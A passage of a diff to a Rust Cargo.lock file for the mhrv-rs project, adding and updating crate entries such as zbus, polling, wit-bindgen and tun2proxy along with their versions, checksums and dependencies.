+name = "event-listener"
+version = "3.1.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d93877bcde0eb80ca09131a08d23f0a5c18a620b01db137dba666d18cd9b30c2"
+dependencies = [
+ "concurrent-queue",
+ "parking",
+ "pin-project-lite",
+]
+
 [[package]]
 name = "event-listener"
 version = "5.4.1"
@@ -1191,10 +1539,19 @@ version = "0.5.4"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "8be9f3dfaaffdae2972880079a491a1a8bb7cbed0b8dd7a347f668b4150a3b93"
 dependencies = [
- "event-listener",
+ "event-listener 5.4.1",
  "pin-project-lite",
 ]
 
+[[package]]
+name = "fastrand"
+version = "1.9.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "e51093e27b0797c359783294ca4f0a911c270184cb10f85783b118614a1501be"
+dependencies = [
+ "instant",
+]
+
 [[package]]
 name = "fastrand"
 version = "2.4.1"
@@ -1328,13 +1685,31 @@ version = "0.3.32"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "cecba35d7ad927e23624b22ad55235f2239cfa44fd10428eecbeba6d6a717718"
 
+[[package]]
+name = "futures-lite"
+version = "1.13.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "49a9d51ce47660b1e808d3c990b4709f2f415d928835a17dfd16991515c46bce"
+dependencies = [
+ "fastrand 1.9.0",
+ "futures-core",
+ "futures-io",
+ "memchr",
+ "parking",
+ "pin-project-lite",
+ "waker-fn",
+]
+
 [[package]]
 name = "futures-lite"
 version = "2.6.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "f78e10609fe0e0b3f4157ffab1876319b5b0db102a2c60dc4626306dc46b44ad"
 dependencies = [
+ "fastrand 2.4.1",
  "futures-core",
+ "futures-io",
+ "parking",
  "pin-project-lite",
 ]
 
@@ -1417,8 +1792,22 @@ checksum = "899def5c37c4fd7b2664648c28120ecec138e4d395b459e5ca34f9cce2dd77fd"
 dependencies = [
  "cfg-if",
  "libc",
- "r-efi",
+ "r-efi 5.3.0",
+ "wasip2",
+]
+
+[[package]]
+name = "getrandom"
+version = "0.4.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "0de51e6874e94e7bf76d726fc5d13ba782deca734ff60d5bb2fb2607c7406555"
+dependencies = [
+ "cfg-if",
+ "libc",
+ "r-efi 6.0.0",
+ "rand_core 0.10.1",
  "wasip2",
+ "wasip3",
 ]
 
 [[package]]
@@ -1538,7 +1927,7 @@ dependencies = [
  "presser",
  "thiserror 1.0.69",
  "winapi",
- "windows",
+ "windows 0.52.0",
 ]
 
 [[package]]
@@ -1634,6 +2023,12 @@ version = "0.5.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "2304e00983f87ffb38b55b444b5e3b60a884b5d30c0fca7d82fe33449bbe55ea"
 
+[[package]]
+name = "hermit-abi"
+version = "0.3.9"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d231dfb89cfffdbc30e7fc41579ed6066ad03abda9e567ccafae602b97ec5024"
+
 [[package]]
 name = "hermit-abi"
 version = "0.5.2"
@@ -1654,25 +2049,19 @@ checksum = "dfa686283ad6dd069f105e5ab091b04c62850d3e4cf5d67debad1933f55023df"
 
 [[package]]
 name = "hickory-proto"
-version = "0.25.2"
+version = "0.26.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "f8a6fe56c0038198998a6f217ca4e7ef3a5e51f46163bd6dd60b5c71ca6c6502"
+checksum = "a916d0494600d99ecb15aadfab677ad97c4de559e8f1af0c129353a733ac1fcc"
 dependencies = [
- "async-trait",
- "cfg-if",
  "data-encoding",
- "enum-as-inner",
- "futures-channel",
- "futures-io",
- "futures-util",
  "idna",
  "ipnet",
+ "jni 0.22.4",
  "once_cell",
- "rand 0.9.4",
+ "rand 0.10.1",
  "ring",
  "thiserror 2.0.18",
  "tinyvec",
- "tokio",
  "tracing",
  "url",
 ]
@@ -1810,6 +2199,12 @@ dependencies = [
  "zerovec",
 ]
 
+[[package]]
+name = "id-arena"
+version = "2.3.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "3d3067d79b975e8844ca9eb072e16b31c3c1c36928edf9c6789548c524d0d954"
+
 [[package]]
 name = "idna"
 version = "1.1.0"
@@ -1852,6 +2247,28 @@ checksum = "d466e9454f08e4a911e14806c24e16fba1b4c121d1ea474396f396069cf949d9"
 dependencies = [
  "equivalent",
  "hashbrown 0.17.0",
+ "serde",
+ "serde_core",
+]
+
+[[package]]
+name = "instant"
+version = "0.1.13"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "e0242819d153cba4b4b05a5a8f2a7e9bbf97b6055b2a002b395c96b5ff3c0222"
+dependencies = [
+ "cfg-if",
+]
+
+[[package]]
+name = "io-lifetimes"
+version = "1.0.11"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "eae7b9aee968036d54dce06cebaefd919e4472e753296daccd6d344e3e2df0c2"
+dependencies = [
+ "hermit-abi 0.3.9",
+ "libc",
+ "windows-sys 0.48.0",
 ]
 
 [[package]]
@@ -2030,6 +2447,12 @@ version = "1.5.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "bbd2bcb4c963f2ddae06a2efc7e9f3591312473c50c6685e1f298068316e66fe"
 
+[[package]]
+name = "leb128fmt"
+version = "0.1.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "09edd9e8b54e49e587e4f6295a7d29c3ea94d469cb40ab8ca70b288248a81db2"
+
 [[package]]
 name = "libc"
 version = "0.2.185"
@@ -2078,6 +2501,12 @@ dependencies = [
  "redox_syscall 0.7.4",
 ]
 
+[[package]]
+name = "linux-raw-sys"
+version = "0.3.8"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "ef53942eb7bf7ff43a617b3e2c1c4a5ecf5944a7c1bc12d7ee39bbb15e5c1519"
+
 [[package]]
 name = "linux-raw-sys"
 version = "0.4.15"
@@ -2160,6 +2589,15 @@ dependencies = [
  "libc",
 ]
 
+[[package]]
+name = "memoffset"
+version = "0.7.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "5de893c32cde5f383baa4c04c5d6dbdd735cfd4a794b0debdb2bb1b421da5ff4"
+dependencies = [
+ "autocfg",
+]
+
 [[package]]
 name = "memoffset"
 version = "0.9.1"
@@ -2186,7 +2624,7 @@ dependencies = [
 
 [[package]]
 name = "mhrv-rs"
-version = "1.6.0"
+version = "1.9.25"
 dependencies = [
  "base64 0.22.1",
  "bytes",
@@ -2356,6 +2794,18 @@ dependencies = [
  "tokio",
 ]
 
+[[package]]
+name = "nix"
+version = "0.26.4"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "598beaf3cc6fdd9a5dfb1630c2800c7acd31df7aaf0f565796fba2b53ca1af1b"
+dependencies = [
+ "bitflags 1.3.2",
+ "cfg-if",
+ "libc",
+ "memoffset 0.7.1",
+]
+
 [[package]]
 name = "nix"
 version = "0.30.1"
@@ -2378,7 +2828,7 @@ dependencies = [
  "cfg-if",
  "cfg_aliases 0.2.1",
  "libc",
- "memoffset",
+ "memoffset 0.9.1",
 ]
 
 [[package]]
@@ -2456,7 +2906,7 @@ version = "0.7.6"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "680998035259dcfcafe653688bf2aa6d3e2dc05e98be6ab46afb089dc84f1df8"
 dependencies = [
- "proc-macro-crate",
+ "proc-macro-crate 3.5.0",
  "proc-macro2",
  "quote",
  "syn 2.0.117",
@@ -2471,19 +2921,36 @@ dependencies = [
  "malloc_buf",
 ]
 
+[[package]]
+name = "objc-sys"
+version = "0.2.0-beta.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "df3b9834c1e95694a05a828b59f55fa2afec6288359cda67146126b3f90a55d7"
+
 [[package]]
 name = "objc-sys"
 version = "0.3.5"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "cdb91bdd390c7ce1a8607f35f3ca7151b65afc0ff5ff3b34fa350f7d7c7e4310"
 
+[[package]]
+name = "objc2"
+version = "0.3.0-beta.3.patch-leaks.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "7e01640f9f2cb1220bbe80325e179e532cb3379ebcd1bf2279d703c19fe3a468"
+dependencies = [
+ "block2 0.2.0-alpha.6",
+ "objc-sys 0.2.0-beta.2",
+ "objc2-encode 2.0.0-pre.2",
+]
+
 [[package]]
 name = "objc2"
 version = "0.4.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "559c5a40fdd30eb5e344fbceacf7595a81e242529fb4e21cf5f43fb4f11ff98d"
 dependencies = [
- "objc-sys",
+ "objc-sys 0.3.5",
  "objc2-encode 3.0.0",
 ]
 
@@ -2493,7 +2960,7 @@ version = "0.5.2"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "46a785d4eeff09c14c487497c162e92766fbb3e4059a71840cecc03d9a50b804"
 dependencies = [
- "objc-sys",
+ "objc-sys 0.3.5",
  "objc2-encode 4.1.0",
 ]
 
@@ -2582,6 +3049,15 @@ dependencies = [
  "objc2-metal",
 ]
 
+[[package]]
+name = "objc2-encode"
+version = "2.0.0-pre.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "abfcac41015b00a120608fdaa6938c44cb983fee294351cc4bac7638b4e50512"
+dependencies = [
+ "objc-sys 0.2.0-beta.2",
+]
+
 [[package]]
 name = "objc2-encode"
 version = "3.0.0"
@@ -2694,6 +3170,16 @@ dependencies = [
  "libredox",
 ]
 
+[[package]]
+name = "ordered-stream"
+version = "0.2.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "9aa2b01e1d916879f73a53d01d1d6cee68adbb31d6d9177a8cfce093cced1d50"
+dependencies = [
+ "futures-core",
+ "pin-project-lite",
+]
+
 [[package]]
 name = "owned_ttf_parser"
 version = "0.25.1"
@@ -2767,7 +3253,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "c835479a4443ded371d6c535cbfd8d31ad92c5d23ae9770a61bc155e4992a3c1"
 dependencies = [
  "atomic-waker",
- "fastrand",
+ "fastrand 2.4.1",
  "futures-io",
 ]
 
@@ -2796,6 +3282,22 @@ dependencies = [
  "miniz_oxide",
 ]
 
+[[package]]
+name = "polling"
+version = "2.8.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "4b2d323e8ca7996b3e23126511a523f7e62924d93ecd5ae73b333815b0eb3dce"
+dependencies = [
+ "autocfg",
+ "bitflags 1.3.2",
+ "cfg-if",
+ "concurrent-queue",
+ "libc",
+ "log",
+ "pin-project-lite",
+ "windows-sys 0.48.0",
+]
+
 [[package]]
 name = "polling"
 version = "3.11.0"
@@ -2804,7 +3306,7 @@ checksum = "5d0e4f59085d47d8241c88ead0f274e8a0cb551f3625263c05eb8dd897c34218"
 dependencies = [
  "cfg-if",
  "concurrent-queue",
- "hermit-abi",
+ "hermit-abi 0.5.2",
  "pin-project-lite",
  "rustix 1.1.4",
  "windows-sys 0.61.2",
@@ -2861,13 +3363,33 @@ version = "0.3.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "e8cf8e6a8aa66ce33f63993ffc4ea4271eb5b0530a9002db8455ea6050c77bfa"
 
+[[package]]
+name = "prettyplease"
+version = "0.2.37"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "479ca8adacdd7ce8f1fb39ce9ecccbfe93a3f1344b3d0d97f20bc0196208f62b"
+dependencies = [
+ "proc-macro2",
+ "syn 2.0.117",
+]
+
+[[package]]
+name = "proc-macro-crate"
+version = "1.3.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "7f4c021e1093a56626774e81216a4ce732a735e5bad4868a03f3ed65ca0c3919"
+dependencies = [
+ "once_cell",
+ "toml_edit 0.19.15",
+]
+
 [[package]]
 name = "proc-macro-crate"
 version = "3.5.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "e67ba7e9b2b56446f1d419b1d807906278ffa1a658a8a5d8a39dcb1f5a78614f"
 dependencies = [
- "toml_edit",
+ "toml_edit 0.25.11+spec-1.1.0",
 ]
 
 [[package]]
@@ -2913,7 +3435,13 @@ dependencies = [
 name = "r-efi"
 version = "5.3.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "69cdb34c158ceb288df11e18b4bd39de994f6657d83847bdffdbd7f346754b0f"
+checksum = "69cdb34c158ceb288df11e18b4bd39de994f6657d83847bdffdbd7f346754b0f"
+
+[[package]]
+name = "r-efi"
+version = "6.0.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "f8dcc9c7d52a811697d2151c701e0d08956f92b0e24136cf4cf27b57a6a0d9bf"
 
 [[package]]
 name = "rand"
@@ -2936,6 +3464,17 @@ dependencies = [
  "rand_core 0.9.5",
 ]
 
+[[package]]
+name = "rand"
+version = "0.10.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d2e8e8bcc7961af1fdac401278c6a831614941f6164ee3bf4ce61b7edb162207"
+dependencies = [
+ "chacha20",
+ "getrandom 0.4.2",
+ "rand_core 0.10.1",
+]
+
 [[package]]
 name = "rand_chacha"
 version = "0.3.1"
@@ -2974,6 +3513,12 @@ dependencies = [
  "getrandom 0.3.4",
 ]
 
+[[package]]
+name = "rand_core"
+version = "0.10.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "63b8176103e19a2643978565ca18b50549f6101881c443590420e4dc998a3c69"
+
 [[package]]
 name = "raw-window-handle"
 version = "0.5.2"
@@ -3153,6 +3698,20 @@ dependencies = [
  "nom",
 ]
 
+[[package]]
+name = "rustix"
+version = "0.37.28"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "519165d378b97752ca44bbe15047d5d3409e875f39327546b42ac81d7e18c1b6"
+dependencies = [
+ "bitflags 1.3.2",
+ "errno",
+ "io-lifetimes",
+ "libc",
+ "linux-raw-sys 0.3.8",
+ "windows-sys 0.48.0",
+]
+
 [[package]]
 name = "rustix"
 version = "0.38.44"
@@ -3163,7 +3722,7 @@ dependencies = [
  "errno",
  "libc",
  "linux-raw-sys 0.4.15",
- "windows-sys 0.52.0",
+ "windows-sys 0.59.0",
 ]
 
 [[package]]
@@ -3298,6 +3857,28 @@ dependencies = [
  "zmij",
 ]
 
+[[package]]
+name = "serde_repr"
+version = "0.1.20"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "175ee3e80ae9982737ca543e96133087cbd9a485eecc3bc4de9c1a37b47ea59c"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "syn 2.0.117",
+]
+
+[[package]]
+name = "sha1"
+version = "0.10.6"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "e3bf829a2d51ab4a5ddf1352d8470c140cadc8301b2ae1789db023f01cedd6ba"
+dependencies = [
+ "cfg-if",
+ "cpufeatures 0.2.17",
+ "digest",
+]
+
 [[package]]
 name = "sha2"
 version = "0.10.9"
@@ -3305,7 +3886,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "a7507d819769d01a365ab707794a4084392c824f54a7a6a7862f8c3d0892b283"
 dependencies = [
  "cfg-if",
- "cpufeatures",
+ "cpufeatures 0.2.17",
  "digest",
 ]
 
@@ -3449,6 +4030,16 @@ dependencies = [
  "serde",
 ]
 
+[[package]]
+name = "socket2"
+version = "0.4.10"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "9f7916fc008ca5542385b89a3d3ce689953c143e9304a9bf8beec1de48994c0d"
+dependencies = [
+ "libc",
+ "winapi",
+]
+
 [[package]]
 name = "socket2"
 version = "0.6.3"
@@ -3461,9 +4052,9 @@ dependencies = [
 
 [[package]]
 name = "socks5-impl"
-version = "0.8.1"
+version = "0.8.2"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "1eae7c78f163b7805f66493c787d7bad4816146faf0cf655d57c78b90c383ce3"
+checksum = "150816c2d954315f351129f438f851285e1ddb6d6ccc850ddd45c523d19abda0"
 dependencies = [
  "async-trait",
  "bytes",
@@ -3566,8 +4157,8 @@ version = "3.27.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "32497e9a4c7b38532efcdebeef879707aa9f794296a4f0244f6f69e9bc8574bd"
 dependencies = [
- "fastrand",
- "getrandom 0.3.4",
+ "fastrand 2.4.1",
+ "getrandom 0.4.2",
  "once_cell",
  "rustix 1.1.4",
  "windows-sys 0.61.2",
@@ -3709,7 +4300,7 @@ dependencies = [
  "parking_lot",
  "pin-project-lite",
  "signal-hook-registry",
- "socket2",
+ "socket2 0.6.3",
  "tokio-macros",
  "windows-sys 0.61.2",
 ]
@@ -3748,6 +4339,12 @@ dependencies = [
  "tokio",
 ]
 
+[[package]]
+name = "toml_datetime"
+version = "0.6.11"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "22cddaf88f4fbc13c51aebbf5f8eceb5c7c5a9da2ac40a13519eb5b0a0e8f11c"
+
 [[package]]
 name = "toml_datetime"
 version = "1.1.1+spec-1.1.0"
@@ -3757,6 +4354,17 @@ dependencies = [
  "serde_core",
 ]
 
+[[package]]
+name = "toml_edit"
+version = "0.19.15"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "1b5bb770da30e5cbfde35a2d7b9b8a2c4b8ef89548a7a6aeab5c9a576e3e7421"
+dependencies = [
+ "indexmap",
+ "toml_datetime 0.6.11",
+ "winnow 0.5.40",
+]
+
 [[package]]
 name = "toml_edit"
 version = "0.25.11+spec-1.1.0"
@@ -3764,9 +4372,9 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "0b59c4d22ed448339746c59b905d24568fcbb3ab65a500494f7b8c3e97739f2b"
 dependencies = [
  "indexmap",
- "toml_datetime",
+ "toml_datetime 1.1.1+spec-1.1.0",
  "toml_parser",
- "winnow",
+ "winnow 1.0.2",
 ]
 
 [[package]]
@@ -3775,7 +4383,7 @@ version = "1.1.2+spec-1.1.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "a2abe9b86193656635d2411dc43050282ca48aa31c2451210f4202550afb7526"
 dependencies = [
- "winnow",
+ "winnow 1.0.2",
 ]
 
 [[package]]
@@ -3891,9 +4499,9 @@ dependencies = [
 
 [[package]]
 name = "tun2proxy"
-version = "0.7.20"
+version = "0.7.21"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "0576f75fd691ad86cdc4348f29fb8770037ab8140179f1f9f8f6991f7ebd2176"
+checksum = "d336ad07beb04a9e219972fcdc54a71d2586cdfd35ac03551a629e4ca328db3c"
 dependencies = [
  "android_logger",
  "async-trait",
@@ -3955,6 +4563,17 @@ dependencies = [
  "tokio",
 ]
 
+[[package]]
+name = "uds_windows"
+version = "1.1.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "89daebc3e6fd160ac4aa9fc8b3bf71e1f74fbf92367ae71fb83a037e8bf164b9"
+dependencies = [
+ "memoffset 0.9.1",
+ "tempfile",
+ "winapi",
+]
+
 [[package]]
 name = "unicase"
 version = "2.9.0"
@@ -4039,6 +4658,12 @@ version = "0.0.18"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "051eb1abcf10076295e815102942cc58f9d5e3b4560e46e53c21e8ff6f3af7b1"
 
+[[package]]
+name = "waker-fn"
+version = "1.2.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "317211a0dc0ceedd78fb2ca9a44aed3d7b9b26f81870d485c07122b4350673b7"
+
 [[package]]
 name = "walkdir"
 version = "2.5.0"
@@ -4061,7 +4686,16 @@ version = "1.0.3+wasi-0.2.9"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "20064672db26d7cdc89c7798c48a0fdfac8213434a1186e5ef29fd560ae223d6"
 dependencies = [
- "wit-bindgen",
+ "wit-bindgen 0.57.1",
+]
+
+[[package]]
+name = "wasip3"
+version = "0.4.0+wasi-0.3.0-rc-2026-01-06"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "5428f8bf88ea5ddc08faddef2ac4a67e390b88186c703ce6dbd955e1c145aca5"
+dependencies = [
+ "wit-bindgen 0.51.0",
 ]
 
 [[package]]
@@ -4119,6 +4753,40 @@ dependencies = [
  "unicode-ident",
 ]
 
+[[package]]
+name = "wasm-encoder"
+version = "0.244.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "990065f2fe63003fe337b932cfb5e3b80e0b4d0f5ff650e6985b1048f62c8319"
+dependencies = [
+ "leb128fmt",
+ "wasmparser",
+]
+
+[[package]]
+name = "wasm-metadata"
+version = "0.244.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "bb0e353e6a2fbdc176932bbaab493762eb1255a7900fe0fea1a2f96c296cc909"
+dependencies = [
+ "anyhow",
+ "indexmap",
+ "wasm-encoder",
+ "wasmparser",
+]
+
+[[package]]
+name = "wasmparser"
+version = "0.244.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "47b807c72e1bac69382b3a6fb3dbe8ea4c0ed87ff5629b8685ae6b9a611028fe"
+dependencies = [
+ "bitflags 2.11.1",
+ "hashbrown 0.15.5",
+ "indexmap",
+ "semver",
+]
+
 [[package]]
 name = "wayland-backend"
 version = "0.3.15"
@@ -4467,7 +5135,7 @@ version = "0.1.11"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "c2a7b1c03c876122aa43f3020e6c3c3ee5c05081c9a00739faf7503aeba10d22"
 dependencies = [
- "windows-sys 0.61.2",
+ "windows-sys 0.48.0",
 ]
 
 [[package]]
@@ -4476,6 +5144,17 @@ version = "0.4.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "712e227841d057c1ee1cd2fb22fa7e5a5461ae8e48fa2ca79ec42cfc1931183f"
 
+[[package]]
+name = "windows"
+version = "0.48.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "e686886bc078bc1b0b600cac0147aadb815089b6e4da64016cbd754b6342700f"
+dependencies = [
+ "windows-implement 0.48.0",
+ "windows-interface 0.48.0",
+ "windows-targets 0.48.5",
+]
+
 [[package]]
 name = "windows"
 version = "0.52.0"
@@ -4501,13 +5180,24 @@ version = "0.62.2"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "b8e83a14d34d0623b51dce9581199302a221863196a1dde71a7663a4c2be9deb"
 dependencies = [
- "windows-implement",
- "windows-interface",
+ "windows-implement 0.60.2",
+ "windows-interface 0.59.3",
  "windows-link",
  "windows-result",
  "windows-strings",
 ]
 
+[[package]]
+name = "windows-implement"
+version = "0.48.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "5e2ee588991b9e7e6c8338edf3333fbe4da35dc72092643958ebb43f0ab2c49c"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "syn 1.0.109",
+]
+
 [[package]]
 name = "windows-implement"
 version = "0.60.2"
@@ -4519,6 +5209,17 @@ dependencies = [
  "syn 2.0.117",
 ]
 
+[[package]]
+name = "windows-interface"
+version = "0.48.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "e6fb8df20c9bcaa8ad6ab513f7b40104840c8867d5751126e4df3b08388d0cc7"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "syn 1.0.109",
+]
+
 [[package]]
 name = "windows-interface"
 version = "0.59.3"
@@ -4910,6 +5611,15 @@ dependencies = [
  "xkbcommon-dl",
 ]
 
+[[package]]
+name = "winnow"
+version = "0.5.40"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "f593a95398737aeed53e489c785df13f3618e41dbcd6718c6addbf1395aa6876"
+dependencies = [
+ "memchr",
+]
+
 [[package]]
 name = "winnow"
 version = "1.0.2"
@@ -4945,12 +5655,100 @@ dependencies = [
  "winreg",
 ]
 
+[[package]]
+name = "wit-bindgen"
+version = "0.51.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d7249219f66ced02969388cf2bb044a09756a083d0fab1e566056b04d9fbcaa5"
+dependencies = [
+ "wit-bindgen-rust-macro",
+]
+
 [[package]]
 name = "wit-bindgen"
 version = "0.57.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "1ebf944e87a7c253233ad6766e082e3cd714b5d03812acc24c318f549614536e"
 
+[[package]]
+name = "wit-bindgen-core"
+version = "0.51.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "ea61de684c3ea68cb082b7a88508a8b27fcc8b797d738bfc99a82facf1d752dc"
+dependencies = [
+ "anyhow",
+ "heck",
+ "wit-parser",
+]
+
+[[package]]
+name = "wit-bindgen-rust"
+version = "0.51.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "b7c566e0f4b284dd6561c786d9cb0142da491f46a9fbed79ea69cdad5db17f21"
+dependencies = [
+ "anyhow",
+ "heck",
+ "indexmap",
+ "prettyplease",
+ "syn 2.0.117",
+ "wasm-metadata",
+ "wit-bindgen-core",
+ "wit-component",
+]
+
+[[package]]
+name = "wit-bindgen-rust-macro"
+version = "0.51.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "0c0f9bfd77e6a48eccf51359e3ae77140a7f50b1e2ebfe62422d8afdaffab17a"
+dependencies = [
+ "anyhow",
+ "prettyplease",
+ "proc-macro2",
+ "quote",
+ "syn 2.0.117",
+ "wit-bindgen-core",
+ "wit-bindgen-rust",
+]
+
+[[package]]
+name = "wit-component"
+version = "0.244.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "9d66ea20e9553b30172b5e831994e35fbde2d165325bec84fc43dbf6f4eb9cb2"
+dependencies = [
+ "anyhow",
+ "bitflags 2.11.1",
+ "indexmap",
+ "log",
+ "serde",
+ "serde_derive",
+ "serde_json",
+ "wasm-encoder",
+ "wasm-metadata",
+ "wasmparser",
+ "wit-parser",
+]
+
+[[package]]
+name = "wit-parser"
+version = "0.244.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "ecc8ac4bc1dc3381b7f59c34f00b67e18f910c2c0f50015669dde7def656a736"
+dependencies = [
+ "anyhow",
+ "id-arena",
+ "indexmap",
+ "log",
+ "semver",
+ "serde",
+ "serde_derive",
+ "serde_json",
+ "unicode-xid",
+ "wasmparser",
+]
+
 [[package]]
 name = "writeable"
 version = "0.6.3"
@@ -5013,6 +5811,16 @@ version = "0.3.10"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "bec9e4a500ca8864c5b47b8b482a73d62e4237670e5b5f1d6b9e3cae50f28f2b"
 
+[[package]]
+name = "xdg-home"
+version = "1.3.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "ec1cdab258fb55c0da61328dc52c8764709b249011b2cad0454c72f0bf10a1f6"
+dependencies = [
+ "libc",
+ "windows-sys 0.59.0",
+]
+
 [[package]]
 name = "xkbcommon-dl"
 version = "0.4.2"
@@ -5070,6 +5878,72 @@ dependencies = [
  "synstructure",
 ]
 
+[[package]]
+name = "zbus"
+version = "3.15.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "675d170b632a6ad49804c8cf2105d7c31eddd3312555cffd4b740e08e97c25e6"
+dependencies = [
+ "async-broadcast",
+ "async-executor",
+ "async-fs",
+ "async-io 1.13.0",
+ "async-lock 2.8.0",
+ "async-process",
+ "async-recursion",
+ "async-task",
+ "async-trait",
+ "blocking",
+ "byteorder",
+ "derivative",
+ "enumflags2",
+ "event-listener 2.5.3",
+ "futures-core",
+ "futures-sink",
+ "futures-util",
+ "hex",
+ "nix 0.26.4",
+ "once_cell",
+ "ordered-stream",
+ "rand 0.8.6",
+ "serde",
+ "serde_repr",
+ "sha1",
+ "static_assertions",
+ "tracing",
+ "uds_windows",
+ "winapi",
+ "xdg-home",
+ "zbus_macros",
+ "zbus_names",
+ "zvariant",
+]
+
+[[package]]
+name = "zbus_macros"
+version = "3.15.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "7131497b0f887e8061b430c530240063d33bf9455fa34438f388a245da69e0a5"
+dependencies = [
+ "proc-macro-crate 1.3.1",
+ "proc-macro2",
+ "quote",
+ "regex",
+ "syn 1.0.109",
+ "zvariant_utils",
+]
+
+[[package]]
+name = "zbus_names"
+version = "2.6.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "437d738d3750bed6ca9b8d423ccc7a8eb284f6b1d6d4e225a0e4e6258d864c8d"
+dependencies = [
+ "serde",
+ "static_assertions",
+ "zvariant",
+]
+
 [[package]]
 name = "zerocopy"
 version = "0.8.48"
@@ -5155,3 +6029,41 @@ name = "zmij"
 version = "1.0.21"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "b8848ee67ecc8aedbaf3e4122217aff892639231befc6a1b58d29fff4c2cabaa"
+
+[[package]]
+name = "zvariant"
+version = "3.15.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "4eef2be88ba09b358d3b58aca6e41cd853631d44787f319a1383ca83424fb2db"
+dependencies = [
+ "byteorder",
+ "enumflags2",
+ "libc",
+ "serde",
+ "static_assertions",
+ "zvariant_derive",
+]
+
+[[package]]
+name = "zvariant_derive"
+version = "3.15.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "37c24dc0bed72f5f90d1f8bb5b07228cbf63b3c6e9f82d82559d4bae666e7ed9"
+dependencies = [
+ "proc-macro-crate 1.3.1",
+ "proc-macro2",
+ "quote",
+ "syn 1.0.109",
+ "zvariant_utils",
+]
+
+[[package]]
+name = "zvariant_utils"
